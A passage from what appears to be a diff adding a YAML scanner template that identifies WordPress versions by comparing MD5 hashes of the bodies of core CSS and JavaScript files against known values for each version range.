"(\"7a848ee830c0c5b67da1a0566c3b4ec7\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"0aca5fc957d7d65b7dc908967df8d2c1\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"c859a7494e93d515ea023e845b862de0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f1a43d2195725369dac369cc3d214af6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"498fd625f4abfedd30fa50bb86cab3d8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c35fd5f35a602a245565b44e15aa604b\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"c6cf978207c6d98f9f51d20a25f34dd2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"ed59d15bec63adfb0080179e64a13954\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"106881f3a4b6d0906d30ce186f0cb4db\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.16 + dsl: + - "(\"8f104e8e20108646cb3e9c69d819f195\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"66bdd3cfa4505a15480321e0ec125d3f\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"215fb1ca4140dd402b16a6316067064a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5229afb1f372bcb09a21d3ef380d8abe\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d3a0abfffab24c079f3e3013ec60136d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"44f3f858820bbd8a2e0df20ed1ef0070\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ac1398f94377751de7ffead484df8333\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"3b1a54b0ef1e4feebd577c268f3b7b56\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"2e38f00fdfff5ee896dd3f15f06cf5d3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b4dcd2e0e34fc54708352f0a0d9d0379\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3a84b0aef5c73a63db74c7c7c52f0de3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b28a18395e56677a32339cbd7c9837dd\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"a0aa2c9698c701cd03da983c6d1eaa00\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"b1f7b5e6dbe60deefaa7691e6a826633\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"2e26ad1954acf52ef1df70ad03186873\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"67aad3843e4f5f4bde34a2f5c9c46aaa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"355d4a2780e2f9b3e980ef74b7d7a146\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e4832a345e012b47c028c8d9dfa2f3ad\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b9cf7f8a3b56f7668afb7e9416efe5bf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5520940066ef5b2112560bec8d606306\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-models.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"9dbd7395fac0f6f1065bd5231d14941f\" == md5(body))" + - type: dsl + name: 4.3 - 4.6.20 + dsl: + - "(\"98fa336128f3c0da0271f568a0cc05d3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"2e7864d513c82363a81c6eb0337bd5f2\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f66d1ebe4decdac8163979876b0023e7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"79e9265523a309157cf3e3346f6cdaf3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a6af52ebc087c3024146b96304ab5b1d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"3848a2f1838aebf9a4ff9dba3613a712\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"0c065b544bad77fbc55a68561cf67055\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6eb56989a9553ce89b1cd706bfa17084\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"92a5d9fdc580782fefac7329ae7c43ab\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"6d5565dfc9ef63ef9188457921c6e708\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"d0fbf5b6c322c1ebe3b972eea62ec894\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"529e91f5ac6fd14fa38d85082d4aeab4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"42280316bc7695cce608c075247712bb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"a5e3ef6d503193408be3c987f0bfbb9a\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"6462ad87157a0ff259d227e676805a15\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5541276bc1d1608b07691b3f8c487c89\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4c9720b69a4695c799544597419eb86a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d4238c1112684c2150318d1d7dd0cf99\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5f0d3d36e8489cf3ce815f2a427121d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"046e7e16b385ceaff66eba4956e99a8d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"50dcb762647a492e4769ea0947b50248\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7b8a4eb193902f3eb5321be2a1f8f39e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3317c4a0df48baaa87a41cfa963ef7f5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4cefd4ea07b52250161119b99b07c5cd\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"fbccb3a9d9e326432416170f500febe6\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d8750588b9608c960a4c84111826363b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"22f2a03358684885e9cfd7001df074a9\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a4e8295dfbbffb2a1b3c15d599aa496f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ae164288125e6d5b18a41cd716b1e290\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"88af7a163758d4d5a13cf5b71e50fcac\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"20b09b48f38414802780b0e76ce0bd23\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"f581a4e8a0512e99baa8762fa1e27c4e\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e010613db1aaafaa8897e716f3594225\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cbcaa7ff91fc06bd6b10449306ba54f9\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4dcd6a050acafbc397b761057d82e6ef\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ce3489857c05ef7d6bde38d61f8c9590\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c2c292b337230f342125bc7488b38bcc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"557ccfd95017d0ea81c6e9f2ec1a6e7e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"aefa2187af77b0f9ab7bacab3df4c0d4\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"9f6f6313a99bacb2e815596b354113d4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a8374ae13c60948627afad8d05b577f3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0681cef20e79f3dbdabd8dc1075ab948\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"768ff7aad2844bd7ade74814c1648bd7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d59ee58d4aed2e96006bf1a02e98bbec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/format-library.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ce6d7774d49a758b607da01c68b15a58\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"590d64772c4414fbb688f129a6c9e9af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"859a85a0da66968152601fa5558b5b07\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"e80477b2ce0ff34ac2fc000495285bbf\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"fc5024975c3d2bc66aa6aeee06647e15\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9f737824d948eed09dcab71a2ab98d0e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ecb50250c3b72af79307c863eaaaca84\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"12ae55e99484787294b80e64348c2384\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e6173e37d837ce77fb8347e1d4a97abc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/rich-text.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"3a06513baf497e53b0908c155f1c6013\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"2b08233d7239ada8cf8b27d302a11a5c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"31082605f1c90333bf255157b8affcb9\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"85d06c1f54c5f65009ae0fa1fc3a2c1f\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"38e202bee269957a40daaa5fff2e98fc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"aa5eebad40c9c789bdb3cba2e188b214\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8476aba44d5fd7cee30353d212ebc763\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"518412e4d64f0204bb35526845a9fd19\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"33adb469a67b720074abc0260904d269\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/rich-text.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"c56b09dee53354f60d943229fd881595\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"56efbae730dff0e4ebe544f04c1bcc61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"898c7a4af828d255f2107593c6798f61\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"2b512c31caf790a2c86921f9e5aba54a\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"f26fd86d54e406c441c32d25c2baaecd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"69c199809f214dea6dea7019d9b4b9c1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"709e70847fcd5ee992d466b36bdd60d2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d50cb814c9f835eaff3493862afff438\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8b9d1f6566b1551875fc38b7438db6f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/format-library.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"824845d2d6081499fc7ccc4077c4eddb\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"dee80998f8a3f592d7bf32754e8e3017\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"306eb481911cf7709eb0b2df94cfc1fd\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"1d0c1f96a2bab8bf8444a4a2518c8e40\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"0356b70777d0a101a52316e7223b6802\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a2a8f2e8d8364cfe0c1f70b88947adfb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"94ff59822055a2299ea5747e6a090f6c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d13511a6298af519aa0b799be66f9a9d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"12b59bd77e0a1f316057732f428e6f41\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/twemoji.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.2 + dsl: + - "(\"116aad1318ef7f049d2f2429faf670b4\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"dd5f53451b94fbbe3145f7987159a24c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"467ef54bff10851a04064eebc9837d52\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"975227e3cbc1876e05bbb107da05fc81\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6e0cefd4871c11ce6bf3d55f83cae0d3\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"8ad73e167829a12b8a553070dd6a05e8\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"446ab329d408aa69da0e448298a039f4\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"9cfd48e37348e36a3caa072318531b08\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b47c1841005ed6866cd72c7fc2b74d46\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"a149011cef16cee2fe0507a94b71d466\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"47008e6186dfd2a8ea800d7d17158824\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d25e686696ccc15195ecc70858f8e9c5\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bcfb47f222286294b85658e5c48271b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bd911c47ffa6cebe9968e2c5c81af2c1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c7b682cf436f591d75807356c449c254\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"dc7d6410824e50cb301d3b5736ecae9e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"aab18f118a004009b60e0daef478df74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-profile.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"21a263cec51227aa5501116b190d2e49\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c5f95e8f9ced3d06d137ec7f5a12de5a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"258b8ad98219b15241bf340eb0f2dbce\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c5faef1bebb47add41bc6b9d8123e5cf\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"658938d60803a1b5937727713fe5c445\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"d7ef7731b4b5a97befab69565fdc2929\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e97fed4b3c06493ab6d1a3d15408ab15\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"28090921c47b8aab172ab53dcc269d00\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c2bcc33ea5397b37fc77de3149618d9f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2b68876c91544e9d82a545409171468f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1f700cd405416317d2d97379c21c7c3c\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9e703dc5d5f400b0b22e2fcf6c3da6e8\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"9a55eb19b2ba406d0c446494f5082362\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8d2bdb3746a32cf6584131f1cf8862e9\" == md5(body))" + - type: dsl + name: 3.1.4 - 3.3.3 + dsl: + - "(\"55b400c3c8a9e0dd988b23e0f04a54e3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.3 + dsl: + - "(\"530bc21feaa9a66288243dd56266dbbe\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"dc2668c5f95d07ede878842297184ba3\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"6f264365c799d04bf353784315b3541e\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"7e8a197f4aec099d481cc4b4dfcc0a21\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1ce6b01fe41dbab94964a8818de75d06\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6a893ff35450bbcd3f7a16f390dde7e5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"415a0ae2d0ac703d2570ed209e058118\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7436086296cefbd1254594fac9cfb5a7\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f3fb0ce780fdba51eac8410bff1f10ca\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ec61c3334afd91d00ef2ae64cf535743\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4df6af8d274c9c84f00995c4b06b8668\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"dc74b14f3d25a91e399b6f613fe11223\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6c35e5396302ef3514598cbf3b2f9947\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a560d2a2be816bcbf121c4b2adeaf615\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e3708169a620043b2c2bad64b0092b7e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9f8a90c453ec305769a851ceba7e13b5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8fa847b3101bc6a314bad8945e882caf\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"23ea18a6eb1d90eac261e4a1b9353d95\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"32278bfa99cf6275086c9adb6404df34\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"617bad9e838b5d8ff1a6694a2c2cf79a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4ef66dffa334e595d9c36c77013039ec\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d58d3bec2d7c08206d637707aaf23b71\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0abc3e469a077baf5d6a3adf7a223295\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"650410205bebd7b94622f81e6da5bf2e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9d35d5641379dbc4ccdf4e78b00d7436\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f1e978748cb955c6753663d5eb74e6e9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bb7cbbb0b68e21bbf842631abc0b2af7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"11c448411266aa8be98a3ec1243342aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/edit-post.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"30484efddfcec29a589a630010742218\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"7c48d5f4807fa10ccb77202a44491a9a\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"7423dbf596bd505ff600ab11c69d15c2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b0d65703decbc306b9d81b05a8625fce\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"049c4a73407e96192a0ac3cc896a4de5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e6dfa21e9e682ef48457d5082eef65af\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"eef17b9afdaa6b821a520587b3957583\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"91bc264d134052313dacb207c1d54647\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0c84a5b42fec684279dea617a6ea0936\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/viewport.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"8335564ab57cab0c2143177a750d4c4e\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"513302ca4e7e577e9d12033577e7e6f3\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d7932636c66dd528dc7fd98caa7a607e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"bd8ff8373b15e52155cdef385a5cb9b3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f644859508f334d4ff334de7f0ba9291\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ac4c0b7c50ac3513ccbf3f444f225b94\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"313d6768fa95fa9606e08d85065f0ccc\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6b8fd78e47bd18e4ea42a7b16c41773b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a557d591281154e3e7d3858ceebdc041\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/edit-post.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"e8b57bb2a220a0add16fd29153bc2c62\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"b8a4b45d991460d09f63361df8cece80\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"3a8f886d748dd1bc6390f29b8b1cc909\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6205cc50d16c3911195c4ba650eae2a5\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4d75a79aec7e44bd8e9ecb609af8ef0b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"401d4d2ca31482d7008b546483ce4ed7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7ac36a48ae712d480e11fdc9a45b193c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9620f0a72d8c82019c7ec8a45dd14f92\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"22419332501f620be339216513af3f5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/viewport.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"b8808c497f7a393dfefb7e247a5c1a40\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"d0f03f46b2a5b0eafc7db072cd7a9c1d\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ea43d42792f43b764449b2618693c069\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"050d9ddb1870241ee572b50a8f718f16\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c52145ba03290a6899622dc4eb31678b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"450867328ab4ca0027028349b98f8f2d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4e6323f06991ccefbecef6253bdcb300\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"60164c2e1e043a1f0f0304a5edf0942f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f72ebda44f55cf1d4237186a74376616\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"b8e01a2dfd278d083558d9ebad4f77c6\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"c79f42c5df39a520784f0356855a6b8b\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ab6108c21a2a1d14df1dc9f0d49827d7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ac76ed468d7b90a9673e680791195b8e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b93a5427eac05dc8585499cbdd0c8a52\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0da91195d40246d5b6db07d553261811\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dd3890418f907e7baba2bda1785c40c6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3c1f461558424e961dc67ca2b475bc38\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7172fa59fb104710f7394a2350a2c884\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"9fc37d757ecb84cd959eee49871c3108\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"4156647efce226809d062e7463a445a5\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"c16f103ecb87682ba3b40546bd0568ed\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e23036d48e0637be779f9f6ae13dbdb7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"2446562857ed21bae441500b23199a89\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f46af19986f894a47409cd04a90e827e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1043ed2681ceedc0263257325bafedde\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"256ed4469caf485d0b740722a00d220b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"03658ccc962f96ad1f01cde772821212\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e850d443575b1d311f75c731c61dde14\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"9c04504d1b70332284c7c83425a7742d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - 